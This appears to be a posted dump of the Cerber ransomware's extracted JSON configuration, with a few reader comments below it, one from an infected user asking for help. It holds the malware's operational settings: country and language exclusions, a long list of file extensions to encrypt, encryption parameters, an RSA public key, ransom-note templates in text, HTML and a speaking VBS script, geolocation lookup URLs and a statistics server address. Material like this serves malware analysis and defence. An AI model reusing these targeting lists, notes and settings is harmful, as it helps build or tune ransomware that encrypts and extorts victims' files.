cerber ransomware
{ | |
"antiav": 1, | |
"blacklist": { | |
"countries": [ | |
"am", | |
"az", | |
"by", | |
"ge", | |
"kg", | |
"kz", | |
"md", | |
"ru", | |
"tm", | |
"tj", | |
"ua", | |
"uz" | |
], | |
"files": [ | |
"bootsect.bak", | |
"iconcache.db", | |
"thumbs.db", | |
"wallet.dat" | |
], | |
"folders": [ | |
":\\$recycle.bin\\",": \\$windows.~bt\\", | |
":\\boot\\",": \\drivers\\", | |
":\\program files\\",": \\program files (x86)\\", | |
":\\programdata\\",": \\users\\all users\\", | |
":\\windows\\","\\appdata\\local\\", | |
"\\appdata\\locallow\\","\\appdata\\roaming\\", | |
"\\public\\music\\sample music\\","\\public\\pictures\\sample pictures\\", | |
"\\public\\videos\\sample videos\\","\\tor browser\\" | |
], | |
"languages": [ | |
1049, | |
1058, | |
1059, | |
1064, | |
1067, | |
1068, | |
1079, | |
1087, | |
1088, | |
1090, | |
1091, | |
2072, | |
2073, | |
2092, | |
2115 | |
] | |
}, | |
"check": { | |
"activity": 0, | |
"country": 1, | |
"language": 1, | |
"vmware": 0 | |
}, | |
"debug": 0, | |
"encrypt": { | |
"files": [ | |
[ | |
".contact", | |
".dbx", | |
".doc", | |
".docx", | |
".jnt", | |
".jpg", | |
".mapimail", | |
".msg", | |
".oab", | |
".ods", | |
".pdf", | |
".pps", | |
".ppsm", | |
".ppt", | |
".pptm", | |
".prf", | |
".pst", | |
".rar", | |
".rtf", | |
".txt", | |
".wab", | |
".xls", | |
".xlsx", | |
".xml", | |
".zip", | |
".1cd", | |
".3ds", | |
".3g2", | |
".3gp", | |
".7z", | |
".7zip", | |
".accdb", | |
".aoi", | |
".asf", | |
".asp", | |
".aspx", | |
".asx", | |
".avi", | |
".bak", | |
".cer", | |
".cfg", | |
".class", | |
".config", | |
".css", | |
".csv", | |
".db", | |
".dds", | |
".dwg", | |
".dxf", | |
".flf", | |
".flv", | |
".html", | |
".idx", | |
".js", | |
".key", | |
".kwm", | |
".laccdb", | |
".ldf", | |
".lit", | |
".m3u", | |
".mbx", | |
".md", | |
".mdf", | |
".mid", | |
".mlb", | |
".mov", | |
".mp3", | |
".mp4", | |
".mpg", | |
".obj", | |
".odt", | |
".pages", | |
".php", | |
".psd", | |
".pwm", | |
".rm", | |
".safe", | |
".sav", | |
".save", | |
".sql", | |
".srt", | |
".swf", | |
".thm", | |
".vob", | |
".wav", | |
".wma", | |
".wmv", | |
".xlsb", | |
".3dm", | |
".aac", | |
".ai", | |
".arw", | |
".c", | |
".cdr", | |
".cls", | |
".cpi", | |
".cpp", | |
".cs", | |
".db3", | |
".docm", | |
".dot", | |
".dotm", | |
".dotx", | |
".drw", | |
".dxb", | |
".eps", | |
".fla", | |
".flac", | |
".fxg", | |
".java", | |
".m", | |
".m4v", | |
".max", | |
".mdb", | |
".pcd", | |
".pct", | |
".pl", | |
".potm", | |
".potx", | |
".ppam", | |
".ppsm", | |
".ppsx", | |
".pptm", | |
".ps", | |
".pspimage", | |
".r3d", | |
".rw2", | |
".sldm", | |
".sldx", | |
".svg", | |
".tga", | |
".wps", | |
".xla", | |
".xlam", | |
".xlm", | |
".xlr", | |
".xlsm", | |
".xlt", | |
".xltm", | |
".xltx", | |
".xlw", | |
".act", | |
".adp", | |
".al", | |
".bkp", | |
".blend", | |
".cdf", | |
".cdx", | |
".cgm", | |
".cr2", | |
".crt", | |
".dac", | |
".dbf", | |
".dcr", | |
".ddd", | |
".design", | |
".dtd", | |
".fdb", | |
".fff", | |
".fpx", | |
".h", | |
".iif", | |
".indd", | |
".jpeg", | |
".mos", | |
".nd", | |
".nsd", | |
".nsf", | |
".nsg", | |
".nsh", | |
".odc", | |
".odp", | |
".oil", | |
".pas", | |
".pat", | |
".pef", | |
".pfx", | |
".ptx", | |
".qbb", | |
".qbm", | |
".sas7bdat", | |
".say", | |
".st4", | |
".st6", | |
".stc", | |
".sxc", | |
".sxw", | |
".tlg", | |
".wad", | |
".xlk", | |
".aiff", | |
".bin", | |
".bmp", | |
".cmt", | |
".dat", | |
".dit", | |
".edb", | |
".flvv", | |
".gif", | |
".groups", | |
".hdd", | |
".hpp", | |
".log", | |
".m2ts", | |
".m4p", | |
".mkv", | |
".mpeg", | |
".ndf", | |
".nvram", | |
".ogg", | |
".ost", | |
".pab", | |
".pdb", | |
".pif", | |
".png", | |
".qed", | |
".qcow", | |
".qcow2", | |
".rvt", | |
".st7", | |
".stm", | |
".vbox", | |
".vdi", | |
".vhd", | |
".vhdx", | |
".vmdk", | |
".vmsd", | |
".vmx", | |
".vmxf", | |
".3fr", | |
".3pr", | |
".ab4", | |
".accde", | |
".accdr", | |
".accdt", | |
".ach", | |
".acr", | |
".adb", | |
".ads", | |
".agdl", | |
".ait", | |
".apj", | |
".asm", | |
".awg", | |
".back", | |
".backup", | |
".backupdb", | |
".bank", | |
".bay", | |
".bdb", | |
".bgt", | |
".bik", | |
".bpw", | |
".cdr3", | |
".cdr4", | |
".cdr5", | |
".cdr6", | |
".cdrw", | |
".ce1", | |
".ce2", | |
".cib", | |
".craw", | |
".crw", | |
".csh", | |
".csl", | |
".db_journal", | |
".dc2", | |
".dcs", | |
".ddoc", | |
".ddrw", | |
".der", | |
".des", | |
".dgc", | |
".djvu", | |
".dng", | |
".drf", | |
".dxg", | |
".eml", | |
".erbsql", | |
".erf", | |
".exf", | |
".ffd", | |
".fh", | |
".fhd", | |
".gray", | |
".grey", | |
".gry", | |
".hbk", | |
".ibank", | |
".ibd", | |
".ibz", | |
".iiq", | |
".incpas", | |
".jpe", | |
".kc2", | |
".kdbx", | |
".kdc", | |
".kpdx", | |
".lua", | |
".mdc", | |
".mef", | |
".mfw", | |
".mmw", | |
".mny", | |
".moneywell", | |
".mrw", | |
".myd", | |
".ndd", | |
".nef", | |
".nk2", | |
".nop", | |
".nrw", | |
".ns2", | |
".ns3", | |
".ns4", | |
".nwb", | |
".nx2", | |
".nxl", | |
".nyf", | |
".odb", | |
".odf", | |
".odg", | |
".odm", | |
".orf", | |
".otg", | |
".oth", | |
".otp", | |
".ots", | |
".ott", | |
".p12", | |
".p7b", | |
".p7c", | |
".pdd", | |
".pem", | |
".plus_muhd", | |
".plc", | |
".pot", | |
".pptx", | |
".psafe3", | |
".py", | |
".qba", | |
".qbr", | |
".qbw", | |
".qbx", | |
".qby", | |
".raf", | |
".rat", | |
".raw", | |
".rdb", | |
".rwl", | |
".rwz", | |
".s3db", | |
".sd0", | |
".sda", | |
".sdf", | |
".sqlite", | |
".sqlite3", | |
".sqlitedb", | |
".sr2", | |
".srf", | |
".srw", | |
".st5", | |
".st8", | |
".std", | |
".sti", | |
".stw", | |
".stx", | |
".sxd", | |
".sxg", | |
".sxi", | |
".sxm", | |
".tex", | |
".wallet", | |
".wb2", | |
".wpd", | |
".x11", | |
".x3f", | |
".xis", | |
".ycbcra", | |
".yuv" | |
] | |
], | |
"network": 0, | |
"new_extension": ".cerber", | |
"max_block_size": 2, | |
"max_blocks": 5, | |
"min_file_size": 0, | |
"multithread": 1, | |
"rsa_key_size": 576 | |
}, | |
"global_public_key": "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1QN0laTm1zMUFBN0dQUVVUaE1XYllpRVlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRhMDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0yY29lYURHdmNHUkFjOWU3Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFRXZzdrUE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0RU5Wd2ZOTkVwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4amlFbWMwZnN6azJXTFNuCnFyeWlNeXphSTVEV0JEallLWEExdHAyaC95Z2JrWWRGWVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFEMEgKblFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==", | |
"help_files": { | |
"files": [ | |
{ | |
"file_body": "\r\n\r\n C E R B E R\r\n -----------\r\n\r\n\r\n Your documents, photos, databases and other important files have been encrypted!\r\n\r\n\r\n To decrypt your files follow the instructions:\r\n\r\n\r\n ---------------------------------------------------------------------------------------\r\n\r\n\r\n 1. Download and install the \"Tor Browser\" from https:\/\/www.torproject.org\/\r\n\r\n\r\n 2. Run it\r\n\r\n\r\n 3. In the \"Tor Browser\" open website:\r\n\r\n http:\/\/decrypttozxybarc.onion\/{PC_ID}\r\n\r\n\r\n 4. Follow the instructions at this website\r\n\r\n\r\n ---------------------------------------------------------------------------------------\r\n\r\n\r\n \u00c2\u00ab...Quod me non necat me fortiorem facit.\u00c2\u00bb\r\n", | |
"file_extension": ".txt" | |
}, | |
{ | |
"file_body": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n <link href=\"http:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/css\/bootstrap.min.css\" rel=\"stylesheet\">\r\n <meta charset=\"utf-8\">\r\n <meta content=\"IE=edge\" http-equiv=\"X-UA-Compatible\">\r\n <meta content=\"width=device-width, initial-scale=1\" name=\"viewport\">\r\n <title>C E R B E R<\/title>\r\n <\/head>\r\n <body>\r\n <div class=\"container\">\r\n <h3 align=\"center\">C E R B E R<\/h3>\r\n <br \/>\r\n <h4>Your documents, photos, databases and other important files have been encrypted!<br \/><br \/>To decrypt your files follow the instructions:<\/h4>\r\n <br \/>\r\n <div class=\"well\">\r\n <h4>1. Download and install the «Tor Browser» from <a href=\"https:\/\/www.torproject.org\/download\/download-easy.html.en\" target=\"_blank\">https:\/\/www.torproject.org\/<\/a><\/h4>\r\n <br \/>\r\n <h4>2. Run it<\/h4>\r\n <br \/>\r\n <h4>3. In the «Tor Browser» open website:<br \/><br \/><div class=\"form-group\" style=\"margin: 0 32px 36px 32px;\"><input class=\"form-control\" style=\"color: #c24; font-size: 22px; height: 50px; text-align: center;\" type=\"text\" value=\"http:\/\/decrypttozxybarc.onion\/{PC_ID}\" readonly><\/div><\/h4>\r\n <h4>4. Follow the instructions at this website<\/h4>\r\n <\/div>\r\n <br \/>\r\n <p style=\"color: #ccc;\">«...Quod me non necat me fortiorem facit.»<\/p>\r\n <br \/>\r\n <\/div>\r\n <\/body>\r\n<\/html>\r\n", | |
"file_extension": ".html" | |
}, | |
{ | |
"file_body": "Set SAPI = CreateObject(\"SAPI.SpVoice\")\r\nSAPI.Speak \"Attention! Attention! Attention!\"\r\nFor i = 1 to 5\r\nSAPI.Speak \"Your documents, photos, databases and other important files have been encrypted!\"\r\nNext", | |
"file_extension": ".vbs" | |
} | |
], | |
"files_name": "# DECRYPT MY FILES #" | |
}, | |
"ip_geo": [ | |
{ | |
"property_name": "country", | |
"url": "http:\/\/ipinfo.io\/json" | |
}, | |
{ | |
"property_name": "country_code", | |
"url": "http:\/\/freegeoip.net\/json\/" | |
}, | |
{ | |
"property_name": "countryCode", | |
"url": "http:\/\/ip-api.com\/json" | |
} | |
], | |
"servers": { | |
"statistics": { | |
"data_finish": "{MD5_KEY}", | |
"data_start": "{MD5_KEY}{PARTNER_ID}{OS}{IS_X64}{IS_ADMIN}{COUNT_FILES}{STOP_REASON}", | |
"ip": "87.98.128.0\/19", | |
"port": 6891, | |
"send_stat": 1, | |
"timeout": 1020 | |
} | |
} | |
} |
-----BEGIN PUBLIC KEY----- | |
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvkty5qhqEydR9076Fevp | |
0uMP7IZNms1AA7GPQUThMWbYiEYIhBKcT0/nwYrBq0Ogv79K1tta04EHTrXgcAp/ | |
OJgBhz9N58aewd4yZBm2coeaDGvcGRAc9e72ObFQ/TME/Io7LZ5qXDWzDafI8LA8 | |
JQmSz0L+/G+LPTWg7kPOpJT7WSkRb9T8w5QgZRJuvvhErHM83kO3ELTH+SoEI53p | |
4ENVwfNNEpOpnpOOSKQobtIw56CsQFrhac0sQlOjek/muVluxjiEmc0fszk2WLSn | |
qryiMyzaI5DWBDjYKXA1tp2h/ygbkYdFYRbAEqwtLxT2wMfWPQI5OkhTa9tZqD0H | |
nQIDAQAB | |
-----END PUBLIC KEY----- |
Can you share how you extracted this from the EXE? |
Hi guys, I got infected with this ransomware last weekend and I managed to clean my laptop (apparently), but I'm stuck with the encrypted files. |
Could you send me an encrypted file for this?